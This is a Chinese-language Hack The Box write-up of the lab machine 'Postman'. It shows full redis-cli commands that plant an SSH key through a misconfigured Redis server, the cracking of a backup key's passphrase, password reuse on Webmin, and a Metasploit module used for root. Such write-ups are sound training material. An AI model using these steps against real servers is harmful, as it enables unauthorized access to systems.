[HTB] Postman
第二台拿下root权限的机器, 虽然难度还是简单,但是很开心
Happy Hacking!
Foothold
首先nmap扫描看一下
看到开了三个端口22,80,1000
这三个服务里第三个不太熟悉, 于是先访问看一下
直接在浏览器里访问http://10.10.10.160:10000 会提示要求访问HTTPS
访问https://10.10.10.160:10000
看到是一个登录界面
这个服务是一个webmin服务,于是自然的想用metasploit搜一下有没有相关的漏洞
结果发现存在的漏洞大多需要用户名和密码
有几个不需要的也利用不成功
于是又试了一下爆破路径,结果也没发现什么有价值的东西
只好求助论坛,发现论坛里面有人说需要全端口扫描,有人提示r***s
猜测是redis的服务,于是扫一下6379端口发现确实有收获
但是实际上并没有用过redis,也不太了解相关的漏洞利用知识,于是搜了一下找到几个比较详细的文章
Redis Remote Command Execution
学习之后发现有一种写ssh 私钥的方法,进行尝试
ssh-keygen -t rsa -C "xxx"
(echo -e "\n\n";cat id_rsa.pub; echo -e "\n\n") > 1.txt
redis-cli -h 10.10.10.160 flushall
cat 1.txt | redis-cli -h 10.10.10.160 -x set crackit
这边写进去之后用redis-cli连接,写一下dir和dbfilename两个字段的值
redis-cli -h 10.10.10.160
> CONFIG SET dir /var/lib/redis/.ssh/
> CONFIG SET dbfilename "authorized_keys"
> save
写完之后连接先不要断,另开一个终端直接连过去
ssh -i id_rsa redis@10.10.10.160
连接成功,得到了redis权限
Matt
在redis权限下一番搜索查看
发现在/tmp
目录下有其他大佬上传的脚本,正好直接运行一下
发现/opt/id_rsa.bak
这个文件属于用户Matt
于是吧这个私钥搞下来,结果发现是加密的
用我们之前在Traverxec写的爆破脚本跑一下,得到key的密码computer2008
之后尝试连接发现失败,解密后用key连接ssh也不行
这时候想起webmin的登录界面,于是尝试用这个密码和用户名登录webmin
结果居然登上了,这里就算是获取到了Matt的权限了
root
还记得之前用到的msf吗?
既然已经有了一个Matt的用户名密码,就可以用msf里面的模块了
用到一个webmin_packageup_rce
的模块
设置好参数直接run
done!
总结
这次机器学到的知识点
- webmin服务及相关的漏洞
- redis配置不当的几种渗透方法
- redis写shell的方法
- ssh key爆破密码的方法